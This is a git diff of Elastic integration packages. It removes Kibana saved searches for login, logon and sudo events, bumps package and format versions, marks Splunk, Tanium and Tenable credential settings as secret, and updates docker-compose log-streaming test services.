"sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "SSH login attempts [Logs System]", - "version": 1 - }, - "coreMigrationVersion": "8.6.1", - "created_at": "2023-03-23T04:03:56.987Z", - "id": "system-62439dc0-f9c9-11e6-a747-6121780e0414", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-6f4071a0-7a78-11ea-bc9a-0baf2ca323a3.json b/packages/system/kibana/search/system-6f4071a0-7a78-11ea-bc9a-0baf2ca323a3.json deleted file mode 100644 index a4db9fdd6cd..00000000000 --- a/packages/system/kibana/search/system-6f4071a0-7a78-11ea-bc9a-0baf2ca323a3.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "columns": [ - "user.name", - "source.domain", - "source.ip", - "winlog.logon.id", - "event.action" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": [ - "4778", - "4779" - ], - "type": "phrases", - "value": "4778, 4779" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "4778" - } - }, - { - "match_phrase": { - "event.code": "4779" - } - } - ] - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Remote Interactive Connections and Disconnections [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-6f4071a0-7a78-11ea-bc9a-0baf2ca323a3", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-757510b0-a87f-11e9-a422-d144027429da.json b/packages/system/kibana/search/system-757510b0-a87f-11e9-a422-d144027429da.json deleted file mode 100644 index e1efc40d0a7..00000000000 --- a/packages/system/kibana/search/system-757510b0-a87f-11e9-a422-d144027429da.json +++ /dev/null @@ -1,116 +0,0 @@ -{ - "attributes": { - "columns": [ - "event.action", - "user.name", - "related.user", - "user.domain", - "source.domain", - "source.ip", - "winlog.event_data.SubjectUserName" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": [ - "4625", - "4740" - ], - "type": "phrases", - "value": "4625, 4740" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "4625" - } - }, - { - "match_phrase": { - "event.code": "4740" - } - } - ] - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "key": "winlog.provider_name", - "negate": false, - "params": { - "query": "Microsoft-Windows-Security-Auditing" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "winlog.provider_name": "Microsoft-Windows-Security-Auditing" - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "3. Login Failed Details", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-757510b0-a87f-11e9-a422-d144027429da", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-7e178c80-fee1-11e9-8405-516218e3d268.json b/packages/system/kibana/search/system-7e178c80-fee1-11e9-8405-516218e3d268.json deleted file mode 100644 index 728ec1dc1b5..00000000000 --- a/packages/system/kibana/search/system-7e178c80-fee1-11e9-8405-516218e3d268.json +++ /dev/null @@ -1,82 +0,0 @@ -{ - "attributes": { - "columns": [ - "user.name", - "source.domain", - "source.ip", - "winlog.logon.id", - "winlog.logon.type" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": [ - "4624" - ], - "type": "phrases", - "value": "4624" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "4624" - } - } - ] - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Logon Details [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-7e178c80-fee1-11e9-8405-516218e3d268", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-8030c1b0-fa77-11e6-ae9b-81e5311e8cab.json b/packages/system/kibana/search/system-8030c1b0-fa77-11e6-ae9b-81e5311e8cab.json deleted file mode 100644 index 33976f6cceb..00000000000 --- a/packages/system/kibana/search/system-8030c1b0-fa77-11e6-ae9b-81e5311e8cab.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "attributes": { - "columns": [ - "user.name", - "user.id", - "group.id", - "system.auth.useradd.home", - "system.auth.useradd.shell" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "system.auth.useradd:*" - } - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "useradd logs [Logs System]", - "version": 1 - }, - "coreMigrationVersion": "8.6.1", - "created_at": "2023-03-23T04:03:56.987Z", - "id": "system-8030c1b0-fa77-11e6-ae9b-81e5311e8cab", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-9066d5b0-fef2-11e9-8405-516218e3d268.json b/packages/system/kibana/search/system-9066d5b0-fef2-11e9-8405-516218e3d268.json deleted file mode 100644 index 85ebf374603..00000000000 --- a/packages/system/kibana/search/system-9066d5b0-fef2-11e9-8405-516218e3d268.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "attributes": { - "columns": [ - "event.action", - "group.name", - "group.domain", - "user.name", - "user.domain", - "host.name" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": [ - "4731", - "4732", - "4733", - "4734", - "4735", - "4737", - "4764", - "4727", - "4728", - "4729", - "4730", - "4754", - "4755", - "4756", - "4757", - "4758", - "4799", - "4749", - "4750", - "4751", - "4752", - "4753", - "4759", - "4760", - "4761", - "4762", - "4763", - "4744", - "4745", - "4746", - "4748" - ], - "type": "phrases", - "value": "4731, 4732, 4733, 4734, 4735, 4737, 4764, 4727, 4728, 4729, 4730, 4754, 4755, 4756, 4757, 4758, 4799, 4749, 4750, 4751, 4752, 4753, 4759, 4760, 4761, 4762, 4763, 4744, 4745, 4746, 4748" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "4731" - } - }, - { - "match_phrase": { - "event.code": "4732" - } - }, - { - "match_phrase": { - "event.code": "4733" - } - }, - { - "match_phrase": { - "event.code": "4734" - } - }, - { - "match_phrase": { - "event.code": "4735" - } - }, - { - "match_phrase": { - "event.code": "4737" - } - }, - { - "match_phrase": { - "event.code": "4764" - } - }, - { - "match_phrase": { - "event.code": "4727" - } - }, - { - "match_phrase": { - "event.code": "4728" - } - }, - { - "match_phrase": { - "event.code": "4729" - } - }, - { - "match_phrase": { - "event.code": "4730" - } - }, - { - "match_phrase": { - "event.code": "4754" - } - }, - { - "match_phrase": { - "event.code": "4755" - } - }, - { - "match_phrase": { - "event.code": "4756" - } - }, - { - "match_phrase": { - "event.code": "4757" - } - }, - { - "match_phrase": { - "event.code": "4758" - } - }, - { - "match_phrase": { - "event.code": "4799" - } - }, - { - "match_phrase": { - "event.code": "4749" - } - }, - { - "match_phrase": { - "event.code": "4750" - } - }, - { - "match_phrase": { - "event.code": "4751" - } - }, - { - "match_phrase": { - "event.code": "4752" - } - }, - { - "match_phrase": { - "event.code": "4753" - } - }, - { - "match_phrase": { - "event.code": "4759" - } - }, - { - "match_phrase": { - "event.code": "4760" - } - }, - { - "match_phrase": { - "event.code": "4761" - } - }, - { - "match_phrase": { - "event.code": "4762" - } - }, - { - "match_phrase": { - "event.code": "4763" - } - }, - { - "match_phrase": { - "event.code": "4744" - } - }, - { - "match_phrase": { - "event.code": "4745" - } - }, - { - "match_phrase": { - "event.code": "4746" - } - }, - { - "match_phrase": { - "event.code": "4748" - } - } - ] - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Group Management Details - Search View [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-9066d5b0-fef2-11e9-8405-516218e3d268", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-Syslog-system-logs.json b/packages/system/kibana/search/system-Syslog-system-logs.json deleted file mode 100644 index 972a1c3664d..00000000000 --- a/packages/system/kibana/search/system-Syslog-system-logs.json +++ /dev/null @@ -1,57 +0,0 @@ -{ - "attributes": { - "columns": [ - "host.hostname", - "process.name", - "message" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlight": { - "fields": { - "*": {} - }, - "fragment_size": 2147483647, - "post_tags": [ - "@/kibana-highlighted-field@" - ], - "pre_tags": [ - "@kibana-highlighted-field@" - ], - "require_field_match": false - }, - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:system.syslog" - } - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Syslog logs [Logs System]", - "version": 1 - }, - "coreMigrationVersion": "8.6.1", - "created_at": "2023-03-23T04:03:56.987Z", - "id": "system-Syslog-system-logs", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-b6f321e0-fa25-11e6-bbd3-29c986c96e5a.json b/packages/system/kibana/search/system-b6f321e0-fa25-11e6-bbd3-29c986c96e5a.json deleted file mode 100644 index 1d3b43970c0..00000000000 --- a/packages/system/kibana/search/system-b6f321e0-fa25-11e6-bbd3-29c986c96e5a.json +++ /dev/null @@ -1,45 +0,0 @@ -{ - "attributes": { - "columns": [ - "user.name", - "system.auth.sudo.user", - "system.auth.sudo.pwd", - "system.auth.sudo.command" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "system.auth.sudo:*" - } - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Sudo commands [Logs System]", - "version": 1 - }, - "coreMigrationVersion": "8.6.1", - "created_at": "2023-03-23T04:03:56.987Z", - "id": "system-b6f321e0-fa25-11e6-bbd3-29c986c96e5a", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/manifest.yml b/packages/system/manifest.yml index 8d5f34ba6e2..5f4876eb806 100644 --- a/packages/system/manifest.yml +++ b/packages/system/manifest.yml @@ -1,14 +1,14 @@ -format_version: 3.0.0 +format_version: 3.0.2 name: system title: System -version: 1.53.0 +version: 1.54.0 description: Collect system logs and metrics from your servers with Elastic Agent. type: integration categories: - os_system conditions: kibana: - version: '^8.11.0' + version: '^8.12.0' screenshots: - src: /img/system-overview.png title: system overview @@ -71,11 +71,13 @@ policy_templates: - name: password type: password title: Splunk REST API Password + secret: true show_user: true required: false - name: token type: password title: Splunk Authorization Token + secret: true description: | Bearer Token or Session Key, e.g. "Bearer eyJFd3e46..." or "Splunk 192fd3e...". Cannot be used with username diff --git a/packages/system_audit/changelog.yml b/packages/system_audit/changelog.yml index 81b39c27934..4df5925955c 100644 --- a/packages/system_audit/changelog.yml +++ b/packages/system_audit/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.10.2" + changes: + - description: capture root requirement + type: enhancement + link: https://github.com/elastic/integrations/issues/8647 - version: "1.10.1" changes: - description: Changed owners diff --git a/packages/system_audit/manifest.yml b/packages/system_audit/manifest.yml index 67216ddb2ff..ca803fc372e 100644 --- a/packages/system_audit/manifest.yml +++ b/packages/system_audit/manifest.yml @@ -3,7 +3,7 @@ name: system_audit title: System Audit description: Collect various logs & metrics from System Audit modules with Elastic Agent. type: integration -version: "1.10.1" +version: "1.10.2" conditions: kibana: version: '^8.7.1' @@ -27,6 +27,9 @@ policy_templates: - type: audit/system title: System Audit description: Collect various logs & metrics from System Audit modules with Elastic Agent. +agent: + privileges: + root: true owner: github: elastic/sec-linux-platform type: elastic diff --git a/packages/tanium/_dev/deploy/docker/docker-compose.yml b/packages/tanium/_dev/deploy/docker/docker-compose.yml index 5aad61867ee..61cb12f1816 100644 --- a/packages/tanium/_dev/deploy/docker/docker-compose.yml +++ b/packages/tanium/_dev/deploy/docker/docker-compose.yml @@ -1,43 +1,37 @@ version: '2.3' services: tanium-tcp-action_history: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9082 -p=tcp /sample_logs/action_history.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9082 -p=tcp /sample_logs/action_history.log tanium-tcp-client_status: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9083 -p=tcp /sample_logs/client_status.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9083 -p=tcp /sample_logs/client_status.log tanium-tcp-discover: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9084 -p=tcp /sample_logs/discover.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9084 -p=tcp /sample_logs/discover.log tanium-tcp-endpoint_config: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9085 -p=tcp /sample_logs/endpoint_config.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9085 -p=tcp /sample_logs/endpoint_config.log tanium-tcp-reporting: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9086 -p=tcp /sample_logs/reporting.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9086 -p=tcp /sample_logs/reporting.log tanium-tcp-threat_response: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9087 -p=tcp /sample_logs/threat_response.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9087 -p=tcp /sample_logs/threat_response.log tanium-action_history-http-endpoint: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -45,7 +39,7 @@ services: - STREAM_ADDR=http://elastic-agent:9087/ command: log --start-signal=SIGHUP --delay=5s /sample_logs/action_history.log tanium-client_status-http-endpoint: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -53,7 +47,7 @@ services: - STREAM_ADDR=http://elastic-agent:9088/ command: log --start-signal=SIGHUP --delay=5s /sample_logs/client_status.log tanium-discover-http-endpoint: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -61,7 +55,7 @@ services: - STREAM_ADDR=http://elastic-agent:9089/ command: log --start-signal=SIGHUP --delay=5s /sample_logs/discover.log tanium-endpoint_config-http-endpoint: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -69,7 +63,7 @@ services: - STREAM_ADDR=http://elastic-agent:9090/ command: log --start-signal=SIGHUP --delay=5s /sample_logs/endpoint_config.log tanium-reporting-http-endpoint: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -77,7 +71,7 @@ services: - STREAM_ADDR=http://elastic-agent:9091/ command: log --start-signal=SIGHUP --delay=5s /sample_logs/reporting.log tanium-threat_response-http-endpoint: - image: docker.elastic.co/observability/stream:v0.9.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: diff --git a/packages/tanium/changelog.yml b/packages/tanium/changelog.yml index 639f58bca3f..ae31cdc428f 100644 --- a/packages/tanium/changelog.yml +++ b/packages/tanium/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.9.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9519 +- version: "1.8.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "1.7.1" changes: - description: Changed owners diff --git a/packages/tanium/data_stream/threat_response/_dev/test/pipeline/test-common-config.yml b/packages/tanium/data_stream/threat_response/_dev/test/pipeline/test-common-config.yml index be41bb0d476..f6701e34caf 100644 --- a/packages/tanium/data_stream/threat_response/_dev/test/pipeline/test-common-config.yml +++ b/packages/tanium/data_stream/threat_response/_dev/test/pipeline/test-common-config.yml @@ -2,3 +2,5 @@ fields: tags: - preserve_original_event - preserve_duplicate_custom_fields +numeric_keyword_fields: + - tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.intel_intra_ids.id \ No newline at end of file diff --git a/packages/tanium/data_stream/threat_response/_dev/test/system/test-http-endpoint-config.yml b/packages/tanium/data_stream/threat_response/_dev/test/system/test-http-endpoint-config.yml index b2469e2b460..825750431d4 100644 --- a/packages/tanium/data_stream/threat_response/_dev/test/system/test-http-endpoint-config.yml +++ b/packages/tanium/data_stream/threat_response/_dev/test/system/test-http-endpoint-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9092 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.intel_intra_ids.id \ No newline at end of file diff --git a/packages/tanium/data_stream/threat_response/_dev/test/system/test-tcp-config.yml b/packages/tanium/data_stream/threat_response/_dev/test/system/test-tcp-config.yml index 34f69bc3698..525439ef37a 100644 --- a/packages/tanium/data_stream/threat_response/_dev/test/system/test-tcp-config.yml +++ b/packages/tanium/data_stream/threat_response/_dev/test/system/test-tcp-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9087 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.intel_intra_ids.id \ No newline at end of file diff --git a/packages/tanium/data_stream/threat_response/fields/fields.yml b/packages/tanium/data_stream/threat_response/fields/fields.yml index 67dfa7145e1..a505796e75e 100644 --- a/packages/tanium/data_stream/threat_response/fields/fields.yml +++ b/packages/tanium/data_stream/threat_response/fields/fields.yml @@ -219,6 +219,12 @@ - name: pid type: keyword description: Process id. + - name: start_time + type: date + description: Start time. + - name: tanium_unique_id + type: keyword + description: Tanium unique id. - name: user type: group fields: @@ -270,6 +276,9 @@ - name: domain type: keyword description: User domain. + - name: group_id + type: keyword + description: User group id. - name: id type: keyword description: User id. @@ -342,6 +351,9 @@ - name: instance_hash type: keyword description: Instance hash. + - name: instance_hash + type: keyword + description: Instance hash. - name: timestamp type: date description: Timestamp. diff --git a/packages/tanium/docs/README.md b/packages/tanium/docs/README.md index 56896a5a602..ef79a834576 100644 --- a/packages/tanium/docs/README.md +++ b/packages/tanium/docs/README.md @@ -1027,6 +1027,8 @@ An example event for `threat_response` looks as following: | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.handles | Process handles. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.md5 | MD5 keyword. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.pid | Process id. | keyword | +| tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.start_time | Start time. | date | +| tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.tanium_unique_id | Tanium unique id. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.user.domain | User domain. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.user.id | User id. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.parent.process.parent.process.user.name | User name. | keyword | @@ -1041,6 +1043,7 @@ An example event for `threat_response` looks as following: | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.start_time | Start time. | date | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.tanium_unique_id | Tanium unique id. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.user.domain | User domain. | keyword | +| tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.user.group_id | User group id. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.user.id | User id. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.acting_artifact.process.user.name | User name. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.tanium_recorder_context.event.file_create.path | Path of file. | keyword | @@ -1057,6 +1060,7 @@ An example event for `threat_response` looks as following: | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.target.file.modification_time | Modification time of file. | date | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.target.file.path | Path of file. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.target.file.size_bytes | File size in bytes. | long | +| tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.target.instance_hash | Instance hash. | keyword | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.timestamp | Timestamp. | date | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.artifact_activity.relevant_actions.verb | Verb. | long | | tanium.threat_response.other_parameters.log_details.payload_decoded.finding.whats.intel_intra_ids.id | Array of intel intra id. | keyword | diff --git a/packages/tanium/manifest.yml b/packages/tanium/manifest.yml index 57445539307..adb5a02c460 100644 --- a/packages/tanium/manifest.yml +++ b/packages/tanium/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: tanium title: Tanium -version: "1.7.1" +version: "1.9.0" description: This Elastic integration collects logs from Tanium with Elastic Agent. type: integration categories: - security conditions: kibana: - version: ^8.3.0 + version: ^8.12.0 elastic: subscription: "basic" screenshots: @@ -79,6 +79,7 @@ policy_templates: required: false show_user: true description: First part of access key. This parameter along with the secret_access_key parameter is required if we are not providing shared_credential_file. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -86,13 +87,15 @@ policy_templates: required: false show_user: true description: Second part of access key. This parameter along with the access_key_id parameter is required if we are not providing shared_credential_file. + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: shared_credential_file type: text title: Shared Credential File @@ -147,12 +150,14 @@ policy_templates: description: The header to check for a specific value specified by `secret.value`. required: false show_user: false + secret: false - name: secret_value type: password title: Secret Value description: The secret stored in the header name specified by `secret.header`. required: false show_user: false + secret: true - name: ssl type: yaml title: SSL Configuration diff --git a/packages/tcp/changelog.yml b/packages/tcp/changelog.yml index 8b4ac15e092..db580985a94 100644 --- a/packages/tcp/changelog.yml +++ b/packages/tcp/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.19.0" + changes: + - description: Update package-spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.18.1" changes: - description: Changed owners diff --git a/packages/tcp/manifest.yml b/packages/tcp/manifest.yml index 26f19482d89..1dd74864386 100644 --- a/packages/tcp/manifest.yml +++ b/packages/tcp/manifest.yml @@ -1,9 +1,9 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: tcp title: Custom TCP Logs description: Collect raw TCP data from listening TCP port with Elastic Agent. type: integration -version: "1.18.1" +version: "1.19.0" conditions: kibana: version: "^8.2.1" diff --git a/packages/tenable_io/changelog.yml b/packages/tenable_io/changelog.yml index 523e06984e6..8d75ea22301 100644 --- a/packages/tenable_io/changelog.yml +++ b/packages/tenable_io/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.9.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "2.8.1" changes: - description: Changed owners diff --git a/packages/tenable_io/manifest.yml b/packages/tenable_io/manifest.yml index df799a253d7..d73d461f732 100644 --- a/packages/tenable_io/manifest.yml +++ b/packages/tenable_io/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: tenable_io title: Tenable Vulnerability Management -version: "2.8.1" +version: "2.9.0" description: Collect logs from Tenable Vulnerability Management with Elastic Agent. type: integration categories: - security 